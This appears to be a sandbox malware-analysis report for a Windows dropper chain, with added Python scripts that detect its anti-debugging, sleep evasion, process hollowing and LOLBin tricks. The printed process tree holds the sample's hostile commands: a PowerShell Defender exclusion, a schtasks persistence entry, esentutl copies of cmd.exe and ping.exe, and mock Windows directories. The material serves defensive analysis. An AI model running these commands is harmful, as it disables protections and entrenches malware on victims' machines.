Source: C6dAUcOA6M.exe, 00000000.00000002.1445092943.0000000000694000.00000004.00000020.00020000.00000000.sdmp; C6dAUcOA6M.exe, 00000000.00000002.1445092943.000000000063E000.00000004.00000020.00020000.00000000.sdmp; Native_neworigin.exe, 0000000D.00000002.1667563278.00000000007C9000.00000004.00000020.00020000.00000000.sdmp; Native_neworigin.exe, 0000000D.00000002.1667563278.000000000077A000.00000004.00000020.00020000.00000000.sdmp; alg.exe, 00000011.00000003.1712292652.000000000066B000.00000004.00000020.00020000.00000000.sdmp; alg.exe, 00000011.00000003.2716618659.000000000066B000.00000004.00000020.00020000.00000000.sdmp; alg.exe, 00000011.00000003.2410341370.000000000066B000.00000004.00000020.00020000.00000000.sdmp; alg.exe, 00000011.00000003.1679864810.000000000066B000.00000004.00000020.00020000.00000000.sdmp; alg.exe, 00000011.00000003.1523809233.000000000066B000.00000004.00000020.00020000.00000000.sdmp; alg.exe, 00000011.00000003.2633471457.000000000066B000.00000004.00000020.00020000.00000000.sdmp; alg.exe, 00000011.00000003.1532040197.000000000066B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe | API call chain: ExitProcess graph end node (graph_0-39925)
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | API call chain: ExitProcess graph end node (graph_13-42047)
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\C6dAUcOA6M.exe | Code function: 0_2_02D0F744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe | Process queried: DebugPort
Source: C:\Users\Public\Libraries\Juqmtmya.PIF | Process queried: DebugPort (2 occurrences)
Source: C:\Users\Public\alpha.pif | Code function: 7_2_00F02E37 IsDebuggerPresent
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Code function: 13_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe | Code function: 0_2_02D0894C LoadLibraryW,GetProcAddress,FreeLibrary
Source: C:\Users\Public\alpha.pif | Code function: 7_2_00F0C1FA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Code function: 13_2_00492B94 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Code function: 13_2_006C1130 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Code function: 13_2_00703F3D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\alpha.pif | Code function: 15_2_00F0C1FA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\alpha.pif | Code function: 7_2_00EEA9D4 GetEnvironmentStringsW,GetProcessHeap,RtlAllocateHeap,memcpy,FreeEnvironmentStringsW
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe | Process token adjusted: Debug
Source: C:\Users\Public\alpha.pif | Code function: 7_2_00EF6EC0 SetUnhandledExceptionFilter
Source: C:\Users\Public\alpha.pif | Code function: 7_2_00EF6B40 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\Public\Libraries\aymtmquJ.pif | Code function: 11_1_00401475 EntryPoint,memset,SetUnhandledExceptionFilter,__set_app_type,_controlfp,__argc,__argv,_environ,_environ,__argv,__getmainargs,__argc,__argv,_environ,__argc,__argc,exit
Source: C:\Users\Public\Libraries\aymtmquJ.pif | Code function: 11_1_004015D7 SetUnhandledExceptionFilter (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Code function: 13_2_004123F1 SetUnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Code function: 13_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Code function: 13_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Code function: 13_2_00701361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Code function: 13_2_00704C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\Public\alpha.pif | Code function: 15_2_00EF6EC0 SetUnhandledExceptionFilter
Source: C:\Users\Public\alpha.pif | Code function: 15_2_00EF6B40 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Memory allocated: page read and write | page guard
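Reading the sleep and anti-debugging signatures above in bulk is easier with a small script. The Python below is an added example written for this page; it is not part of the Joe Sandbox report and not the sample's code. It parses the behaviour lines exactly as they are rendered here (process path run together with the event name, optional trailing "Jump to behavior" link) and builds a per-process evasion profile. Three observations it encodes are worth stating plainly. Joe Sandbox reports "delay time" in milliseconds, and 922337203685477 ms is floor(TimeSpan.MaxValue.Ticks / 10000), so those entries are .NET waits with no real timeout rather than sleeps that will return. The Native_neworigin.exe delays that run from 100000 ms downward by a few hundred milliseconds per call are what a loop that recomputes "time left until my deadline" looks like, which a sandbox that fast-forwards a single long sleep does not defeat. The IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, TerminateProcess chains in Native_neworigin.exe are the MSVC CRT's /GS security-cookie failure handler, so on their own they are not evidence of an anti-debugging check; the fs:[00000030h] reads are PEB pointer loads that precede a BeingDebugged or NtGlobalFlag check but also occur in ordinary runtime code, and SeDebugPrivilege ("Process token adjusted: Debug") is more often preparation for opening other processes than a debugger check. The weights in evasion_score, the 60 s threshold and the API list are this example's assumptions; the sample lines are a subset copied from the report above.

```python
import re
from collections import defaultdict

# One Joe Sandbox behaviour line as rendered on this page: the process path runs
# straight into the event name and many lines end in a "Jump to behavior" link.
# The optional " | " lets the same pattern accept a cleaned-up line.
LINE_RE = re.compile(
    r"^Source:\s*(?P<proc>.+?\.(?:exe|pif|dll))\s*(?:\|\s*)?"
    r"(?P<event>[A-Za-z ]+?):\s*(?P<detail>.*?)\s*(?:Jump to [a-z ]+)?$",
    re.IGNORECASE,
)

# Joe Sandbox reports "delay time" in milliseconds. 922337203685477 ms is
# floor(TimeSpan.MaxValue.Ticks / 10000): a .NET wait with no real timeout.
TIMESPAN_MAX_MS = (2**63 - 1) // 10_000
LONG_SLEEP_MS = 60_000  # assumption: flag a process sleeping a minute or more in total

DEBUGGER_APIS = {"IsDebuggerPresent", "CheckRemoteDebuggerPresent",
                 "NtQueryInformationProcess", "NtSetInformationThread"}
# IsDebuggerPresent -> SetUnhandledExceptionFilter -> UnhandledExceptionFilter ->
# TerminateProcess is the MSVC CRT /GS cookie-failure handler, not an anti-debug check.
GS_FAILURE_CHAIN = {"IsDebuggerPresent", "SetUnhandledExceptionFilter",
                    "UnhandledExceptionFilter", "TerminateProcess"}


def is_countdown(delays, min_len=5):
    """True for a run of sleeps that shrinks step by step: the code recomputes
    'time left until my deadline' each iteration, so fast-forwarding one sleep
    only makes the next one shorter."""
    if len(delays) < min_len:
        return False
    steps = [a - b for a, b in zip(delays, delays[1:])]
    return all(s > 0 for s in steps) and max(steps) <= 5 * min(steps)


def _empty():
    return {"sleeps": [], "infinite_waits": 0, "debugger_apis": set(),
            "crt_gs_handlers": 0, "peb_reads": 0, "debugport_queries": 0,
            "sedebug": False}


def profile(lines):
    """Group the evasion-relevant events of the report by process image name."""
    procs = defaultdict(_empty)
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        p = procs[m["proc"].rsplit("\\", 1)[-1]]
        event, detail = m["event"].strip(), m["detail"]
        if event == "Thread delayed":
            ms = int(re.search(r"delay time[^\d]*(\d+)", detail).group(1))
            if ms >= TIMESPAN_MAX_MS:
                p["infinite_waits"] += 1
            else:
                p["sleeps"].append(ms)
        elif event == "Code function":
            names = set(re.findall(r"[A-Za-z]\w+", detail))
            if GS_FAILURE_CHAIN <= names:
                p["crt_gs_handlers"] += 1
            else:
                p["debugger_apis"] |= names & DEBUGGER_APIS
            if "fs:[00000030h]" in detail:  # TEB+0x30 holds the PEB pointer on x86
                p["peb_reads"] += 1
        elif event == "Process queried" and detail.startswith("DebugPort"):
            p["debugport_queries"] += 1  # NtQueryInformationProcess(ProcessDebugPort)
        elif event == "Process token adjusted" and detail.startswith("Debug"):
            p["sedebug"] = True  # SeDebugPrivilege, usually a prelude to touching other processes
    return procs


def evasion_score(p):
    """Crude weighting; the numbers are this example's assumption, not a Joe Sandbox score."""
    score = 2 * len(p["debugger_apis"] - {"IsDebuggerPresent"})
    score += 1 if "IsDebuggerPresent" in p["debugger_apis"] else 0
    score += 2 if p["debugport_queries"] else 0
    score += 1 if p["peb_reads"] else 0
    score += 2 if p["sedebug"] else 0
    score += 2 if sum(p["sleeps"]) >= LONG_SLEEP_MS else 0
    score += 1 if p["infinite_waits"] else 0
    score += 2 if is_countdown(p["sleeps"]) else 0
    return score


def summarize(lines):
    """Per-process profile plus the derived countdown flag and score."""
    return {name: dict(p, countdown=is_countdown(p["sleeps"]), score=evasion_score(p))
            for name, p in profile(lines).items()}


# Sample input: a subset of lines copied from this report.
SAMPLE_LINES = r"""
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 100000Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99890
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99765
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99655
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99543
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\alg.exeThread delayed: delay time: 60000
Source: C:\Users\user\Desktop\C6dAUcOA6M.exeCode function: 0_2_02D0F744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,0_2_02D0F744
Source: C:\Users\user\Desktop\C6dAUcOA6M.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\Public\alpha.pifCode function: 7_2_00F0C1FA mov eax, dword ptr fs:[00000030h]7_2_00F0C1FA
Source: C:\Users\Public\alpha.pifCode function: 7_2_00EF6B40 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00EF6B40
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCode function: 13_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_0040CE09
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess token adjusted: DebugJump to behavior
""".strip().splitlines()

if __name__ == "__main__":
    for name, p in sorted(summarize(SAMPLE_LINES).items(), key=lambda kv: -kv[1]["score"]):
        print(f"{p['score']:>2}  {name:<22} sleeps={len(p['sleeps'])} countdown={p['countdown']} "
              f"infinite={p['infinite_waits']} apis={sorted(p['debugger_apis'])} "
              f"peb={p['peb_reads']} debugport={p['debugport_queries']} "
              f"sedebug={p['sedebug']} crt_gs={p['crt_gs_handlers']}")
```

On the sample lines this ranks Native_neworigin.exe first (countdown sleeps, an infinite wait and SeDebugPrivilege, with its IsDebuggerPresent hits correctly attributed to the CRT handler), then the C6dAUcOA6M.exe dropper (CheckRemoteDebuggerPresent plus the DebugPort query it performs underneath); alpha.pif, the renamed cmd.exe, scores only for the PEB read, which is the expected false-positive profile for a benign CRT.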

                    HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' (2 occurrences)
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe | Memory allocated: C:\Users\Public\Libraries\aymtmquJ.pif base: 400000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Juqmtmya.PIF | Memory allocated: C:\Users\Public\Libraries\aymtmquJ.pif base: 400000 protect: page execute and read and write (2 occurrences)
Source: C:\Windows\SysWOW64\esentutl.exe | File created: C:\Users\Public\alpha.pif
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe | Section unmapped: C:\Users\Public\Libraries\aymtmquJ.pif base address: 400000
Source: C:\Users\Public\Libraries\Juqmtmya.PIF | Section unmapped: C:\Users\Public\Libraries\aymtmquJ.pif base address: 400000 (2 occurrences)
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe | Memory written: C:\Users\Public\Libraries\aymtmquJ.pif base: 36F008
Source: C:\Users\Public\Libraries\Juqmtmya.PIF | Memory written: C:\Users\Public\Libraries\aymtmquJ.pif base: 391008
Source: C:\Users\Public\Libraries\Juqmtmya.PIF | Memory written: C:\Users\Public\Libraries\aymtmquJ.pif base: 20D008
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe | Process created: C:\Users\Public\Libraries\aymtmquJ.pif C:\Users\Public\Libraries\aymtmquJ.pif
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"
Source: C:\Users\Public\Libraries\aymtmquJ.pif | Process created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe "C:\Users\user\AppData\Local\Temp\Native_neworigin.exe"
Source: C:\Users\Public\Libraries\aymtmquJ.pif | Process created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 02:17 /du 23:59 /sc daily /ri 1 /f
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Process created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"
Source: C:\Users\Public\alpha.pif | Process created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
Source: C:\Users\Public\Libraries\Juqmtmya.PIF | Process created: C:\Users\Public\Libraries\aymtmquJ.pif C:\Users\Public\Libraries\aymtmquJ.pif (2 occurrences)
Source: C:\Users\Public\Libraries\aymtmquJ.pif | Process created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe "C:\Users\user\AppData\Local\Temp\Native_neworigin.exe" (2 occurrences)
Source: C:\Users\Public\Libraries\aymtmquJ.pif | Process created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" (2 occurrences)
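The process tree above contains four evasion moves that detect better as a chain than as single events. esentutl /y <src> /d <dst> /o copies cmd.exe and ping.exe into C:\Users\Public under .pif names, so an ESE maintenance utility is doing the file copy (a LOLBin pattern) and the copies inherit none of the reputation or HIPS rules keyed on the image name; the renamed ping is then run as xpha.pif 127.0.0.1 -n 10, a ten-second delay, and deleted. mkdir "\\?\C:\Windows " and "\\?\C:\Windows \SysWOW64" create a directory whose name differs from the real Windows folder only by a trailing space; the \\?\ prefix is what stops Win32 path normalisation from stripping that space, and the rmdir calls remove the directory again afterwards. powershell Add-MpPreference -ExclusionPath excludes the ACCApi drop folder from Defender scanning, and schtasks /create ... /sc daily /ri 1 reruns apihost.exe from AppData every minute. The RWX allocation at base 400000 in aymtmquJ.pif, the section unmap at the same address, the memory writes and the creation of that process by the same parent are the stages of process hollowing; the report groups them by signature rather than in execution order, so a rule should match on the set of stages per (injector, target) pair, not on their sequence. The Python below is an added example for this page (not Joe Sandbox code and not the sample's) that applies those rules to the lines as rendered here and correlates the esentutl copies with the later execution of the copies. The rule names, the user-writable path list, the System32-source check and the sample subset are this example's assumptions and constructions.

```python
import re
from collections import defaultdict

# Same line shape as the rest of this report: "Source: <process><Event>: <detail>",
# optionally with " | " between process and event and a trailing "Jump to ..." link.
LINE_RE = re.compile(
    r"^Source:\s*(?P<proc>.+?\.(?:exe|pif|dll))\s*(?:\|\s*)?"
    r"(?P<event>[A-Za-z ]+?):\s*(?P<detail>.*?)\s*(?:Jump to [a-z ]+)?$",
    re.IGNORECASE,
)
ESENTUTL_COPY = re.compile(r"esentutl(?:\.exe)?\s+/y\s+(\S+)\s+/d\s+(\S+)", re.IGNORECASE)
INJECT_TARGET = re.compile(
    r"^(?P<target>.+?\.(?:exe|pif))\s+base(?: address)?:\s*[0-9a-f]+(?:\s+protect:\s*(?P<prot>.+))?$",
    re.IGNORECASE,
)
QUOTED = re.compile(r'"([^"]*)"')
USER_WRITABLE = ("\\appdata\\", "\\users\\public\\", "\\temp\\")  # assumption: standard-user writable


def norm(path):
    """Lower-case and collapse the doubled backslashes the report prints in command lines."""
    return path.replace("\\\\", "\\").strip('"').lower()


def basename(path):
    return norm(path).rsplit("\\", 1)[-1]


def detect(lines):
    """Return (rule, actor, detail) findings for the evasion chain in the process tree."""
    findings = []
    renamed = {}               # basename of an esentutl copy -> system binary it really is
    stages = defaultdict(set)  # (injector, target) -> hollowing stages seen, in any order
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        actor, event, detail = basename(m["proc"]), m["event"].strip(), m["detail"]
        if event == "Process created":
            image, _, cmd = detail.partition(" ")
            child, lower = basename(image), cmd.lower()
            copy = ESENTUTL_COPY.search(cmd)
            if copy:
                src, dst = norm(copy.group(1)), norm(copy.group(2))
                renamed[basename(dst)] = basename(src)
                if "\\windows\\system32\\" in src and not dst.endswith(".exe"):
                    findings.append(("lolbin_copy", actor, f"{basename(src)} -> {dst} via esentutl /y"))
            if re.search(r"\b(mk|rm)dir\b", lower):
                for q in QUOTED.findall(cmd):
                    # "\\?\" bypasses Win32 path normalisation, which is what lets the
                    # trailing space survive: "C:\Windows " is not C:\Windows.
                    if any(part != part.strip() for part in q.split("\\") if part):
                        findings.append(("mock_trusted_dir", actor, q))
            if "add-mppreference" in lower and "-exclusion" in lower:
                findings.append(("defender_exclusion", actor, cmd))
            if "schtasks" in lower and "/create" in lower:
                tr = re.search(r'/tr\s+"([^"]+)"', cmd, re.IGNORECASE)
                ri = re.search(r"/ri\s+(\d+)", cmd, re.IGNORECASE)
                target = norm(tr.group(1)) if tr else ""
                if any(w in target for w in USER_WRITABLE):
                    every = f", repeats every {ri.group(1)} min" if ri else ""
                    findings.append(("scheduled_task_persistence", actor, target + every))
            if child in renamed:
                findings.append(("renamed_system_binary", actor, f"{child} is {renamed[child]}: {cmd}"))
            stages[(actor, child)].add("create")
        elif event in ("Memory allocated", "Section unmapped", "Memory written"):
            t = INJECT_TARGET.match(detail)
            if not t:
                continue
            key, prot = (actor, basename(t["target"])), (t["prot"] or "").lower()
            if event == "Memory allocated" and "execute" in prot and "write" in prot:
                stages[key].add("alloc_rwx")
            elif event == "Section unmapped":
                stages[key].add("unmap")
            elif event == "Memory written":
                stages[key].add("write")
    for (injector, target), seen in stages.items():
        # The report groups these by signature, not by time, so match on the set.
        if {"create", "unmap", "alloc_rwx", "write"} <= seen:
            findings.append(("process_hollowing", injector, f"{injector} hollowed {target}"))
    return findings


# Sample input: a subset of lines copied from this report.
SAMPLE_LINES = r"""
Source: C:\Users\user\Desktop\C6dAUcOA6M.exeMemory allocated: C:\Users\Public\Libraries\aymtmquJ.pif base: 400000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exeSection unmapped: C:\Users\Public\Libraries\aymtmquJ.pif base address: 400000Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exeMemory written: C:\Users\Public\Libraries\aymtmquJ.pif base: 36F008Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exeProcess created: C:\Users\Public\Libraries\aymtmquJ.pif C:\Users\Public\Libraries\aymtmquJ.pifJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /oJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /oJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64" Jump to behavior
Source: C:\Users\Public\alpha.pifProcess created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 02:17 /du 23:59 /sc daily /ri 1 /f
""".strip().splitlines()

if __name__ == "__main__":
    for rule, actor, detail in detect(SAMPLE_LINES):
        print(f"{rule:<28} {actor:<18} {detail}")
```

The renamed-binary correlation is the part worth keeping in a real rule set: once the esentutl copy has been seen, every later execution of alpha.pif or xpha.pif is reported with the binary it actually is, so the ping -n 10 delay shows up as "xpha.pif is ping.exe" and the mkdir calls as cmd.exe rather than as an unknown .pif.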
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Code function: 13_2_006E8550 GetVolumeInformationW,wsprintfW,GetLastError,GetLastError,GetUserNameW,GetLastError,GetLastError,GetUserNameW,LocalFree,AllocateAndInitializeSid,wsprintfW,SetEntriesInAclW,GetLastError,OpenMutexW
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe | Code function: 0_2_02CF5ACC GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe | Code function: 0_2_02CFA7C4 GetLocaleInfoA
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe | Code function: 0_2_02CF5BD8 lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe | Code function: 0_2_02CFA810 GetLocaleInfoA
Source: C:\Users\Public\alpha.pif | Code function: 7_2_00EE8572 GetLocaleInfoW (14 calls),setlocale
Source: C:\Users\Public\alpha.pif | Code function: 7_2_00EE6854 GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc
Source: C:\Users\Public\alpha.pif | Code function: 7_2_00EE9310 GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Code function: 13_2_00417A20 GetLocaleInfoA
Source: C:\Users\Public\alpha.pif | Code function: 15_2_00EE8572 GetLocaleInfoW (14 calls),setlocale
Source: C:\Users\Public\alpha.pif | Code function: 15_2_00EE6854 GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc
Source: C:\Users\Public\alpha.pif | Code function: 15_2_00EE9310 GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW
                    Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\Public\Libraries\aymtmquJ.pifQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
